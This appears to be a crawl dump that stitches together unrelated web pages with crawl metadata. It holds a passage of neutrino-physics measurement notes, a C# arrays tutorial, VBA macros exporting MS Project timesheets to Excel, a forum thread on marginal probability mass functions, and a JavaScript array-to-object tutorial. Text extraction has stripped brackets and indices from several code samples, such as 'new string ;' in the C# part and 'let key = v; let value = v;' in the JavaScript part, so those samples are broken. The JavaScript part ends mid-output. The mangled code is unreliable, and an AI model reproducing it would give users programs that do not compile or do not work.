flux.\n3  AMBROSIO 2000 result is based on the upgoing partially contained event sample. It came from 4.1 live years of data taking with the full detector, from April 1994 to February 1999. The average energy of atmospheric muon neutrinos corresponding to this sample is 4$~$GeV. The first error is statistical, the second is the systematic error, dominated by the 25$\\%$ theoretical error in the rate (20$\\%$ in the flux and 15$\\%$ in the cross section, added in quadrature). Within statistics, the observed deficit is uniform over the zenith angle.\n4  AMBROSIO 2000 result is based on the combined samples of downgoing partially contained events and upgoing stopping events. These two subsamples could not be distinguished due to the lack of timing information. The result came from 4.1 live years of data taking with the full detector, from April 1994 to February 1999. The average energy of atmospheric muon neutrinos corresponding to this sample is 4$~$GeV. The first error is statistical, the second is the systematic error, dominated by the 25$\\%$ theoretical error in the rate (20$\\%$ in the flux and 15$\\%$ in the cross section, added in quadrature). Within statistics, the observed deficit is uniform over the zenith angle.\n5  AMBROSIO 1998 result is for all nadir angles and updates AHLEN 1995 result. The lower cutoff on the muon energy is 1$~$GeV. In addition to the statistical and systematic errors, there is a Monte Carlo flux error (theoretical error) of $\\pm0.13$. With a neutrino oscillation hypothesis, the fit either to the flux or zenith distribution independently yields sin$^22\\theta =1.0$ and $\\Delta \\mathit m{}^{2}\\sim{}$ a few times $10^{-3}$ eV${}^{2}$. However, the fit to the observed zenith distribution gives a maximum probability for $\\chi {}^{2}$ of only 5$\\%$ for the best oscillation hypothesis.\n6  CASPER 1991 correlates showering/nonshowering signature of single-ring events with parent atmospheric-neutrino flavor. They find nonshowering ($\\approx{}{{\\mathit \\nu}_{{\\mu}}}$ induced) fraction is $0.41$ $\\pm0.03$ $\\pm0.02$, as compared with expected $0.51$ $\\pm0.05$ (syst).\n7  AGLIETTA 1989 finds no evidence for any anomaly in the neutrino flux. They define $\\rho$ = (measured number of ${{\\mathit \\nu}_{{e}}}$'s)/(measured number of ${{\\mathit \\nu}_{{\\mu}}}$'s). They report $\\rho$(measured)=$\\rho$(expected) = $0.96$ ${}^{+0.32}_{-0.28}$.\n8  From this data BOLIEV 1981 obtain the limit $\\Delta \\mathit m{}^{2}{}\\leq{}$ $6 \\times 10^{-3}$ eV${}^{2}$ for maximal mixing, ${{\\mathit \\nu}_{{\\mu}}}$ $\\nrightarrow$ ${{\\mathit \\nu}_{{\\mu}}}$ type oscillation.\nReferences:\nPR D73 072002 First Observations of Separated Atmospheric ${{\\mathit \\nu}_{{\\mu}}}$ and ${{\\overline{\\mathit \\nu}}_{{\\mu}}}$ Events in the MINOS Detector\n AMBROSIO 2001\nPL B517 59 Matter Effects in Upward Going Muons and Sterile Neutrino Oscillations\n AMBROSIO 2000\nPL B478 5 Low Energy Atmospheric Muon Neutrinos in MACRO\n AMBROSIO 1998\nPL B434 451 Measurement of the Atmospheric Neutrino Induced Upgoing Muon Flux using MACRO\n CASPER 1991\nPRL 66 2561 Measurement of Atmospheric Neutrino Composition with IMB-3\n AGLIETTA 1989\nEPL 8 611 Experimental Study of Atmospheric Neutrino Flux in the NUSEX Experiment\n BOLIEV 1981\nSJNP 34 787 Limitations on Parameters of Neutrino Oscillations According to Data of Baksan Underground Telescope\n CROUCH 1978\nPR D18 2239 Cosmic Ray Muon Fluxes Deep Underground: Intensity vs Depth, and the Neutrino Induced Component" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8497691,"math_prob":0.9962976,"size":3561,"snap":"2020-24-2020-29","text_gpt3_token_len":1062,"char_repetition_ratio":0.11639021,"word_repetition_ratio":0.284153,"special_character_ratio":0.3386689,"punctuation_ratio":0.1235119,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99508613,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-03T14:08:14Z\",\"WARC-Record-ID\":\"<urn:uuid:67f038f4-4726-41bb-9a4c-ab9737d33fe2>\",\"Content-Length\":\"48388\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:200b01bc-d39c-4334-866c-b7af8894a8bc>\",\"WARC-Concurrent-To\":\"<urn:uuid:e68d8375-cd22-46f4-8463-88626bf564c1>\",\"WARC-IP-Address\":\"128.3.28.110\",\"WARC-Target-URI\":\"http://pdglive.lbl.gov/DataBlock.action?node=S067DU1\",\"WARC-Payload-Digest\":\"sha1:WWZKZXKFKNEDZ5BP3ENVMCJQ5GRAMAXN\",\"WARC-Block-Digest\":\"sha1:AGJFZ7US4B4CPLI5OBRN5IPJ67YLLJJ6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655882051.19_warc_CC-MAIN-20200703122347-20200703152347-00012.warc.gz\"}"}
https://www.softwaretestinghelp.com/c-sharp/multi-dimensional-and-jagged-arrays-in-csharp/
[ "# MultiDimensional Arrays And Jagged Arrays In C#\n\nThis Tutorial Explains All About Multidimensional Arrays & Jagged Arrays in C# With Examples. Multidimensional arrays are also known as Rectangular Arrays:\n\nWe explored all about Arrays and Single Dimensional Arrays in our previous tutorial.\n\nIn this tutorial, we will learn about Multi-Dimensional Arrays and Jagged Arrays in C# in detail along with examples.\n\n=> Explore Our In-Depth C# Training Tutorials Here\n\n## C# Multi-Dimensional Arrays\n\nMulti-dimensional arrays are also known as rectangular arrays. Multi-dimensional arrays can be further classified into two or three-dimensional arrays.\n\nUnlike single-dimensional arrays where data is stored in a liner sequential manner, a multi-dimensional array stores data in tabular format i.e. in the form of rows and columns. This tabular arrangement of data is also known as a matrix.\n\n### 2-Dimensional Arrays\n\nThe simplest form of multidimensional array is a two-dimensional array. A two-dimensional array can be formed by stacking several one-dimensional arrays together. The following figure will help in understanding the concept better.", null, "The above image is a graphical representation of how the 2-dimensional array looks like. It is denoted by having a row and column. Hence, each building block of the two-dimensional array will be made up of the index representing row number and column number.\n\nMultidimensional arrays are declared like the single-dimensional array with the only difference being the inclusion of comma inside the square bracket to represent rows, columns, etc.\n\n`string[ , ] strArray = new string[2,2];`\n\nNow, let’s have a look at an example to initialize a two-dimensional array.\n\nA 2-D array is declared by\n\n```string [ , ] fruitArray = new string [2,2] {\n{“apple” , “mango”} , /* values for row indexed by 0 */\n{“orange”, “banana”} , /* values for row indexed by 1 */\n};\n```\n\nFor Example, let’s say if my array element has “i” row and “j” column then we can access it by using the following index array[i, j].\n\n```string [ , ] fruitArray = new string [2,2] {\n{“apple” , “mango”} , /* values for row indexed by 0 */\n{“orange”, “banana”} , /* values for row indexed by 1 */\n};\n/* output for the elements present in array*/\nfor (int i = 0; i &lt; 2; i++) {\nfor (int j = 0; j &lt; 2; j++) {\nConsole.WriteLine(\"fruitArray[{0},{1}] = {2}\", i, j, fruitArray[i,j]);\n}\n}\nConsole.ReadKey();\n```\n\nThe output of the following program will be:\n\nfruitArray[0,0] = apple\nfruitArray[0,1] = mango\nfruitArray[1,0] = orange\nfruitArray[1,1] = banana\n\nExplanation:\n\nThe first part of the program is the Array declaration. We declared a string type array of row size 2 and column size 2. In the next part, we tried to access the array using for loop.\n\nWe have used a nested for loop for accessing the values. The outer for loop provides the row number i.e. it will start with the “zeroth” row and then move ahead. The inner for loop defines the column number. With each row number passed by the first for loop, the second for loop will assign a column number and access the data from the cell.\n\n## Jagged Arrays In C#\n\nAnother type of array that is available with C# is a Jagged Array. A jagged array can be defined as an array consisting of arrays. The jagged arrays are used to store arrays instead of other data types.\n\nA jagged array can be initialized by using two square brackets, where the first square bracket denotes the size of the array that is being defined and the second bracket denotes the array dimension that is going to be stored inside the jagged array.\n\n### Jagged Array Declaration\n\nAs discussed a jagged array can be initialized by the following syntax:\n\n`string[ ][ ] stringArr = new string[ ];`\n\nA jagged array can store multiple arrays with different lengths. We can declare an array of length 2 and another array of length 5 and both of these can be stored in the same jagged array.\n\n### Filling Element Inside Jagged Array\n\nLets first initialize a Jagged Array.\n\n```arrayJag = new string ;\narrayJag = new string ;```\n\nIn the above example, we have initialized a string type jagged array with index “0” and “1” containing an array of size defined inside the square bracket. The 0th index contains a string type array of length 2 and the index “1” contains a string type array of length 3.\n\nThis was how we initialize an array. Let’s now initialize and put values inside a jagged array.\n\n```arrayJag = new string {“apple”, “mango”};\narrayJag = new string {“orange”, “banana”, “guava”};```\n\nHence, as shown in the above example, the jagged array can also be declared with values. To add values, we place a curly bracket after the declared jagged array with the list of values.\n\nIt is also possible to initialize the jagged array while declaring it.\n\nThis can be done by using the following approach.\n\n```string[][] jaggedArray = new string [] {\nnew string[] {“apple”, “mango”},\nnew string[] {“orange”, “banana”, “guava”}\n};\n```\n\nIn the above example, we defined a Jagged array with name “jaggedArray” with size 2 and then inside the curly bracket we defined and declared its constituent arrays.\n\n### Retrieve Data From A Jagged Array\n\nUntil now we learned about putting data inside a Jagged array. Now, we will discuss the method to retrieve data from a Jagged array. We will use the same example that we discussed earlier and will try to retrieve all the data from that array.\n\n```string[][] jaggedArray = new string [] {\nnew string[] {“apple”, “mango”},\nnew string[] {“orange”, “banana”, “guava”}\n};\n/* retrieve value from each array element */\nfor (int i = 0; i < jaggedArray.Length; i++) {\nfor (int j = 0; j < jaggedArray[i].Length; j++) {\nConsole.Write(jaggedArray[i][j]+ “ ”);\n}\nConsole.WriteLine();\n}\nConsole.ReadKey();\n```\n\nThe output of the following program will be:\n\napple mango\norange banana guava\n\nExplanation:\n\nWe used two for loops to transverse through the elements. The first for loop defined the index for the Jagged array. Another nested for loop was used to transverse through the array present in the given jagged array index, then we printed the result to console.\n\nPoints to Remember:\n\n• A jagged array is an array of arrays. i.e. it stores arrays as its values.\n• The jagged array will throw out of range exception if the specified index doesn’t exist.\n\n## Conclusion\n\nIn this tutorial, we learned about Jagged and Multidimensional arrays in C#. We learned how to declare and initialize a two-dimensional array. We also created a simple program to retrieve data from a two-dimensional array.\n\nThen we discussed in detail about Jagged array, which is an array of arrays.\n\nA Jagged array is unique in itself as it stores arrays as values. Jagged arrays are quite similar to other arrays with the only difference being the type of value it stores.\n\n=> FREE C# Training Tutorials For All" ]
[ null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20444%20234'%3E%3C/svg%3E", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79741895,"math_prob":0.87941986,"size":6683,"snap":"2021-04-2021-17","text_gpt3_token_len":1586,"char_repetition_ratio":0.17502621,"word_repetition_ratio":0.12752858,"special_character_ratio":0.24524914,"punctuation_ratio":0.11893584,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9704368,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-17T04:23:38Z\",\"WARC-Record-ID\":\"<urn:uuid:a6b26edc-795b-40f8-9c02-3e7a93ea8b96>\",\"Content-Length\":\"561786\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2613bdd1-40e8-4f3f-b76f-755cf2e8457f>\",\"WARC-Concurrent-To\":\"<urn:uuid:822be551-25a7-4818-8ccc-53f82701969c>\",\"WARC-IP-Address\":\"172.67.73.6\",\"WARC-Target-URI\":\"https://www.softwaretestinghelp.com/c-sharp/multi-dimensional-and-jagged-arrays-in-csharp/\",\"WARC-Payload-Digest\":\"sha1:EE5E5GWXC7I2YBQWHQKU6TG2NSYF2PHW\",\"WARC-Block-Digest\":\"sha1:FJUKKVUYZJXAJKCMJJCO7YJ5O7Y7XVFR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038101485.44_warc_CC-MAIN-20210417041730-20210417071730-00010.warc.gz\"}"}
http://www.waldherr.org/tag/excel2010/
[ "# Export timesheets from MS Project to MS Excel\n\nNot many people on projects typically have MS Project licenses and can read my project plan on their own. Nonetheless everyone has to know what’s going on. Here is a simple macro to export a list of tasks to an Excel spreadsheet for all active resources on the project. You can\n\n• exclude resources (see the NoShow list)\n• customize the target directory (defaultl “C\\:temp”)\n• customize the file names (defaults to Timesheet – <Year> – <Calendar Week> – <Name>\n\nHere is what the resulting files look like. Note that work, actual work and remaining work are displayed in days. The first column contains a field (text28) which I use in MS Project to assign tasks to projects.", null, "All tasks that finish in the current week are highlighted in red, all task that finish in the subsequent week are highlighted in yellow.\n\nIf you run the macro twice in one week, you’ll first have to remove the files of the first run.\n\nCaveat: the macro works reliably only if there is at most one resource assigned to a task.\n\nNo idea, how to use this code? Check out, how to add VBA code to your computer.\n\n```\nOption Explicit\n\nFunction IsInArray(stringToBeFound As String, arr As Variant) As Boolean\nIsInArray = (UBound(Filter(arr, stringToBeFound)) > -1)\nEnd Function\n\n'\n' dumps all tasks for all resources into individual excel files\n' works only iff there is at most one resource per task\n'\nPublic Sub swaCreateTimeSheets()\nDim r As Resource\nDim realname As String\nDim swaPath As String\nDim swaPrefix As String\nDim swaFilename As String\nDim swaRange As String\nDim i As Integer\n\nDim datTestDate As Date\nDim intCalendarWeek As Integer\nDim intCalendarWeekFinish As Integer\nDim strCalendarWeek As String\n\nDim excelApp As Object, swaWorkbook As Object\nDim swaWorksheet As Worksheet\n\n' list path to files here\nswaPath = \"C:\\TEMP\\\" ' must finish with backslash and MUST BE ACCESSIBLE FOR USER (hint C:\\ does not work in my case)\n\n' prefix for filename\nswaPrefix = \"Timesheet\"\n\n' list here all employees that should not be dumped\nDim NoShow(17) As String\nNoShow(0) = \"Mickey Mouse\"\nNoShow(1) = \"Donald Duck\"\nNoShow(2) = \"Joe Schmoe\"\nNoShow(3) = \"NN\"\nNoShow(4) = \"NN\"\nNoShow(5) = \"NN\"\nNoShow(6) = \"NN\"\nNoShow(7) = \"NN\"\nNoShow(8) = \"NN\"\nNoShow(9) = \"NN\"\nNoShow(10) = \"NN\"\nNoShow(11) = \"NN\"\nNoShow(12) = \"NN\"\nNoShow(13) = \"NN\"\nNoShow(14) = \"NN\"\nNoShow(15) = \"NN\"\nNoShow(16) = \"NN\"\n\ndatTestDate = DateSerial(Year(VBA.Date + (8 - Weekday(VBA.Date)) Mod 7 - 3), 1, 1)\nintCalendarWeek = (VBA.Date - datTestDate - 3 + (Weekday(datTestDate) + 1) Mod 7) \\ 7 + 1 'check out the actual calendar week\nIf intCalendarWeek < 10 Then\nstrCalendarWeek = \"0\" & CStr(intCalendarWeek)\nElse\nstrCalendarWeek = CStr(intCalendarWeek)\nEnd If\n\nFor Each r In ActiveProject.Resources\n' skip irregular entries\nIf Not (r Is Nothing) Then\n' skip no-show employees\nIf Not IsInArray(r.Name, NoShow) Then\n' skip resource with zero remaining work\nIf r.RemainingWork > 0 Then\nswaFilename = swaPath + swaPrefix + \"-\" + CStr(Year(VBA.Date)) + \"-\" + strCalendarWeek + \"-\" + r.Name + \".xlsx\"\n' create the excel file and write header\nIf Not FileExists(swaFilename) Then\n' filename is swaPath + year + KW (leading zero) + Name + \".xlsx\"\n'\nApplication.StatusBar = \"Dumping \" + swaFilename\n\nSet excelApp = CreateObject(\"Excel.Application\")\nexcelApp.Visible = False\nSet swaWorksheet = excelApp.Worksheets(1) ' work with first worksheet\n\n' write header: name, date, actual work in hours, ...\nswaWorksheet.Cells(1, 1) = \"Project\"\nswaWorksheet.Cells(1, 3) = \"UID\"\nswaWorksheet.Cells(1, 4) = \"Name\"\nswaWorksheet.Cells(1, 5) = \"Start\"\nswaWorksheet.Cells(1, 6) = \"Finish\"\nswaWorksheet.Cells(1, 7) = \"Work [d]\"\nswaWorksheet.Cells(1, 8) = \"Actual Work [d]\"\nswaWorksheet.Cells(1, 9) = \"Remaining Work [d]\"\n\nswaWorksheet.Rows(1).EntireRow.Font.Bold = True\n\nexcelApp.ScreenUpdating = False\nexcelApp.Calculation = xlCalculationManual\n\ni = 1\n\n' now dump all tasks with remaining work > 0\nIf InStr(t.ResourceNames, \"[\") = 0 Then\nrealname = t.ResourceNames\nElse\nrealname = Left(t.ResourceNames, InStr(t.ResourceNames, \"[\") - 1)\nEnd If\nIf realname = r.Name And t.RemainingWork > 0 Then\ni = i + 1\n' write info to excel\nswaWorksheet.Cells(i, 1) = t.Text28\nswaWorksheet.Cells(i, 2) = t.OutlineParent.Name\nswaWorksheet.Cells(i, 3) = t.UniqueID\nswaWorksheet.Cells(i, 4) = t.Name\nswaWorksheet.Cells(i, 5) = t.Start\nswaWorksheet.Cells(i, 6) = t.Finish\nswaWorksheet.Cells(i, 7) = t.Work / (60 * 8)\nswaWorksheet.Cells(i, 8) = t.ActualWork / (60 * 8)\nswaWorksheet.Cells(i, 9) = t.RemainingWork / (60 * 8)\n' Debug.Print t.Text28; \" \"; t.OutlineParent.Name; \" \"; realname; \" \"; t.Name, t.Start; t.Finish; t.Work / 60; t.ActualWork / 60; t.RemainingWork / 60\n' if Finish Date in the same calendar week then highlight the entire row\ndatTestDate = DateSerial(Year(t.Finish + (8 - Weekday(t.Finish)) Mod 7 - 3), 1, 1)\nintCalendarWeekFinish = (t.Finish - datTestDate - 3 + (Weekday(datTestDate) + 1) Mod 7) \\ 7 + 1\nIf intCalendarWeekFinish = intCalendarWeek Then\n' Debug.Print realname, intCalendarWeek\nswaWorksheet.Rows(i).EntireRow.Interior.ColorIndex = 3 ' finish this week -> red\nEnd If\nIf intCalendarWeekFinish = intCalendarWeek + 1 Then\n' Debug.Print realname, intCalendarWeek\nswaWorksheet.Rows(i).EntireRow.Interior.ColorIndex = 6 ' finish next week -> yellow\nEnd If\nEnd If\nNext t\n' pimp excel file, close excel file and clean up\nswaWorkbook.Sheets(1).Columns(\"A:I\").AutoFit\n' tricky\nexcelApp.Goto swaWorkbook.Sheets(1).Range(\"A2\")\nexcelApp.ActiveWindow.FreezePanes = True\n' format columns and stuff\nswaWorkbook.Sheets(1).Columns(\"A\").ColumnWidth = 20\nswaWorkbook.Sheets(1).Columns(\"B\").ColumnWidth = 70\nswaWorkbook.Sheets(1).Columns(\"C\").ColumnWidth = 6\nswaWorkbook.Sheets(1).Columns(\"D\").ColumnWidth = 70\nswaWorkbook.Sheets(1).Columns(\"G\").NumberFormat = \"0.0\"\nswaWorkbook.Sheets(1).Columns(\"H\").NumberFormat = \"0.0\"\nswaWorkbook.Sheets(1).Columns(\"I\").NumberFormat = \"0.0\"\n'\nexcelApp.ActiveWorkbook.Sheets(1).Activate ' ugly, but works\nWith excelApp.ActiveSheet\n.AutoFilterMode = False\n.Range(\"A1:I1\").AutoFilter\nEnd With\n\n' if on Excel >= 2010 then select all entries and autoformat table\n' swaRange = \"\\$A\\$1:\\$I\\$\" + CStr(i)\n' excelApp.ActiveSheet.ListObjects.Add(xlSrcRange, Range(swaRange), , xlYes).Name = \"Tabelle3\"\n' excelApp.Range(\"Tabelle3[#All]\").Select\n' excelApp.ActiveSheet.ListObjects(\"Tabelle3\").TableStyle = \"TableStyleMedium2\"\n\n' save and exit Excel\nexcelApp.ScreenUpdating = True\nexcelApp.Calculation = xlCalculationAutomatic\nswaWorkbook.SaveAs swaFilename\nswaWorkbook.Close (True)\nexcelApp.Quit\nElse\nMsgBox (\"File \" + swaFilename + \" exists. Lets stop here.\")\nEnd\nEnd If\nEnd If\nEnd If\nEnd If\nNext r\n\nApplication.StatusBar = \"\"\n\nEnd Sub\n\n```\n\nI find myself often using a number of worksheets in a workbook and navigating through them is cumbersome. Googling for help, I found a a post on the office blogs where a simple macro would automagically create a table of contents (TOC) of all worksheets with hyperlink shortcuts.", null, "I’ve slightly improved the version, the result:\n\n• the macro still creates a TOC 😉\n• you can add worksheets, run the macro again and it will preserve whatever you have in column B (e.g. a description)\n• you can quickly jump back to your TOC with `CTRL-G gg`. The macro adds a shortcut to the TOC sheet, by naming cell A1 “gg”.\n\nCaveat: if you change the order of the tabs and run the macro again, you’ll have to change the order of column B manually.\n\nNo idea, how to use this code? Check out, how to add VBA code to your computer.\n\n```Sub swaCreateTOC()\n\nDim wbBook As Workbook\nDim wsActive As Worksheet\nDim wsSheet As Worksheet\n\nDim lnRow As Long\nDim lnPages As Long\nDim lnCount As Long\n\nDim DataRange As Variant\nDim Irow As Long\nDim Icol As Integer\nDim MyVar As Double\n\nSet wbBook = ActiveWorkbook\n\nWith Application\n.ScreenUpdating = False\nEnd With\n\n'If the TOC sheet already exist delete it and add a new\n'worksheet.\n\nOn Error Resume Next\nWith wbBook\nDataRange = .Worksheets(\"TOC\").Range(\"B1:B10000\").Value ' read all the values at once from the Excel grid, put into an array\n.Worksheets(\"TOC\").Delete\nEnd With\nOn Error GoTo 0\n\nSet wsActive = wbBook.ActiveSheet\nWith wsActive\n.Name = \"TOC\"\nWith .Range(\"A1:B1\")\n.Value = VBA.Array(\"Worksheet\", \"Content\")\n.Font.Bold = True\nEnd With\nEnd With\n\nIf Not IsEmpty(DataRange) Then\nwsActive.Range(\"B1:B10000\").Value = DataRange ' writes all the results back to the range at once\nEnd If\n\nlnRow = 2\nlnCount = 1\n\n'Iterate through the worksheets in the workbook and create\n'of pages to be printed for each sheet on the TOC sheet.\nFor Each wsSheet In wbBook.Worksheets\nIf wsSheet.Name <> wsActive.Name Then\nwsSheet.Activate\nWith wsActive\nSubAddress:=\"'\" & wsSheet.Name & \"'!A1\", _\nTextToDisplay:=wsSheet.Name\nlnPages = wsSheet.PageSetup.Pages().Count\nEnd With\nlnRow = lnRow + 1\nlnCount = lnCount + 1\nEnd If\nNext wsSheet\n\nwsActive.Activate\nwsActive.columns(\"A:B\").EntireColumn.AutoFit\nActiveWindow.DisplayGridlines = False\n' now add the name \"gg\" to A1 of \"TOC\", so you can jump to it with CTRL-G gg" ]
[ null, "http://www.waldherr.org/wp-content/uploads/2014/07/Microsoft-Excel-Timesheet-2014-28-foo-1024x216.jpg", null, "http://www.waldherr.org/wp-content/uploads/2014/06/Microsoft-Excel-Foo.xlsx_2014-06-26_08-32-462.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6137005,"math_prob":0.851603,"size":6753,"snap":"2021-31-2021-39","text_gpt3_token_len":1954,"char_repetition_ratio":0.16135724,"word_repetition_ratio":0.043165468,"special_character_ratio":0.27854288,"punctuation_ratio":0.16904762,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.985454,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,4,null,7,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-26T22:44:03Z\",\"WARC-Record-ID\":\"<urn:uuid:896c71b3-db15-4819-8b8f-f3b5c2811171>\",\"Content-Length\":\"29104\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7a258968-5015-464f-98ac-5135f280d407>\",\"WARC-Concurrent-To\":\"<urn:uuid:21629d4c-780e-478f-ad26-be9de020a006>\",\"WARC-IP-Address\":\"109.237.134.24\",\"WARC-Target-URI\":\"http://www.waldherr.org/tag/excel2010/\",\"WARC-Payload-Digest\":\"sha1:AD46QBXTL2XUDDXBUHVZUIZKGJXXKEJG\",\"WARC-Block-Digest\":\"sha1:QY3MIJQ55SMNVHBGFASITN3B67FWQS7W\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046152156.49_warc_CC-MAIN-20210726215020-20210727005020-00114.warc.gz\"}"}
https://www.physicsforums.com/threads/joint-distribution-easy-qn.239758/
[ "# Joint Distribution (easy qn)\n\n## Homework Statement\n\nThe following table gives the joint probability mass function (p.m.f) of the random variables X and Y.\n\nhttp://img170.imageshack.us/img170/555/tableph9.jpg [Broken]\n\nFind the marginal p.m.f's $$P_X \\left( x \\right)$$ and $$P_Y \\left( y \\right)$$\n\n2. The attempt at a solution\n\nI think I have just missed the point of this somewhere.\nI know that:\n$${P_X \\left( x \\right) = \\sum\\limits_{all\\;y} {P_{X,Y} \\left( {x,y} \\right)} }$$\nand\n$${P_Y \\left( y \\right) = \\sum\\limits_{all\\;x} {P_{X,Y} \\left( {x,y} \\right)} }$$\n\nI just don't know how to apply this to the question properly.\n\nFor $$P_X \\left( x \\right)$$ it's the sum of $${P_{X,Y} \\left( {x,y} \\right)}$$ over all y (y=0,1,2). So do we just take the first row?\ni.e. 0.15+0.20+0.10 = 0.45?\n\nFollowing this, would\n$$P_Y \\left( y \\right)$$ be 0.35?\n\nAny help would be greatly appreciated.\nCheers\n\nLast edited by a moderator:\n\nHello,\nThe possible X values are x=0 and x=1, so if you compute\n\n$$P_x \\left( 0 \\right) = p(0,0)+p(0,1)+p(0,2)=X1$$ Find x1\n$$P_x \\left( 1 \\right) = p(1,0)+p(1,1)+p(1,2)=X2$$ Find x2\n*You basically do this for how many possible X values you have.\n\nThen the marginal pmf is then\n$$P_x \\left( x \\right) = \\left\\{ x1forx= 0; x2forx=1;0,otherwise}$$\n\nThen compute the marginal pmf of Y obtained from the column totals. Hope that makes sense.\n\nLast edited:\n\nSo I should define the marginal pmf's as?\n\n$$P_X \\left( x \\right) = \\left\\{ {\\begin{array}{*{20}c} {0.45\\;...\\;x = 0} \\\\ {0.55\\;...\\;x = 1} \\\\ \\end{array}} \\right.$$\n\n$$P_Y \\left( y \\right) = \\left\\{ {\\begin{array}{*{20}c} {0.35\\;...\\;y = 0} \\\\ {0.3\\;...\\;y = 1} \\\\ {0.35\\;...\\;y = 2} \\\\ \\end{array}} \\right.$$\n\nYes, that's correct. From what I've been taught, you also have to put {0 otherwise} but depending on how the notation that you've been taught in class/book, then it's fine.\n\nAlso, for the marginal pmf of Y you can also put for {.35 y = 0,2 . Again, a notational way to write it.\n\nLast edited:\nYep sure, that makes sense, thanks for your help!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.64683324,"math_prob":0.99989235,"size":950,"snap":"2022-27-2022-33","text_gpt3_token_len":346,"char_repetition_ratio":0.15856236,"word_repetition_ratio":0.014084507,"special_character_ratio":0.3736842,"punctuation_ratio":0.16444445,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99999774,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-30T23:42:55Z\",\"WARC-Record-ID\":\"<urn:uuid:c9cf980b-5ac7-4e6a-bec8-af7899fd39e3>\",\"Content-Length\":\"70683\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ad763357-0e36-4071-b484-ccb236ff2038>\",\"WARC-Concurrent-To\":\"<urn:uuid:32afa6a3-e6d2-4ece-9b96-0524b552e7c5>\",\"WARC-IP-Address\":\"104.26.14.132\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/joint-distribution-easy-qn.239758/\",\"WARC-Payload-Digest\":\"sha1:NIMGVNPQHX5CFSYJC4WROMGWHUQDLKNI\",\"WARC-Block-Digest\":\"sha1:VHNPKEUUG3THJCNDRYCRDBTCU4CKIWD5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103915196.47_warc_CC-MAIN-20220630213820-20220701003820-00049.warc.gz\"}"}
https://origin.geeksforgeeks.org/how-to-convert-two-dimensional-array-into-an-object-in-javascript/?ref=lbp
[ "# How to convert two-dimensional array into an object in JavaScript ?\n\n• Difficulty Level : Basic\n• Last Updated : 16 Apr, 2021\n\nIn this article, we will learn how to convert a two-dimensional array to an object. A two-dimensional array can have any number of rows and two columns.\n\nExample:\n\n```Input: [\n[\"John\", 12],\n[\"Jack\", 13],\n[\"Matt\", 14],\n[\"Maxx\", 15]\n]\n\nOutput: {\n\"John\": 12,\n\"Jack\": 13,\n\"Matt\": 14,\n\"Maxx\": 15\n}```\n\nThe below approaches can be followed to solve the problem.\n\nApproach 1: In this approach, we create an empty object and use the Array.forEach() method to iterate over the array. On every iteration, we insert the first item of the child array into the object as a key and the second item as the value. Then it returns the object after the iterations.\n\nExample:\n\n## Javascript\n\n `function` `arr2obj(arr) { ` ` `  `    ``// Create an empty object ` `    ``let obj = {}; ` ` `  `    ``arr.forEach((v) => { ` ` `  `        ``// Extract the key and the value ` `        ``let key = v; ` `        ``let value = v; ` ` `  `        ``// Add the key and value to ` `        ``// the object ` `        ``obj[key] = value; ` `    ``}); ` ` `  `    ``// Return the object ` `    ``return` `obj; ` `} ` ` `  `console.log( ` `    ``arr2obj([ ` `        ``[``\"John\"``, 12], ` `        ``[``\"Jack\"``, 13], ` `        ``[``\"Matt\"``, 14], ` `        ``[``\"Maxx\"``, 15], ` `    ``]) ` `); `\n\nOutput:\n\n```{\nJack: 13,\nJohn: 12,\nMatt: 14,\nMaxx: 15\n}```\n\nApproach 2: In this approach, we will use the Array.reduce() method and initialize the accumulator with an empty object. On every iteration, we assign the current value as the key’s value of the accumulator and return the accumulator. Then it returns the object after the iterations.\n\nExample:\n\n## Javascript\n\n `function` `arr2obj(arr) { ` `    ``return` `arr.reduce( ` `        ``(acc, curr) => { ` `             `  `            ``// Extract the key and the value ` `            ``let key = curr; ` `            ``let value = curr; ` ` `  `            ``// Assign key and value ` `            ``// to the accumulator ` `            ``acc[key] = value; ` ` `  `            ``// Return the accumulator ` `            ``return` `acc; ` `        ``}, ` ` `  `        ``// Initialize with an empty object ` `        ``{} ` `    ``); ` `} ` ` `  `console.log( ` `    ``arr2obj([ ` `        ``[``\"Eren\"``, ``\"Yeager\"``], ` `        ``[``\"Mikasa\"``, ``\"Ackermann\"``], ` `        ``[``\"Armin\"``, ``\"Arlelt\"``], ` `        ``[``\"Levi\"``, ``\"Ackermann\"``], ` `    ``]) ` `); `\n\nOutput:\n\n```{\nEren: 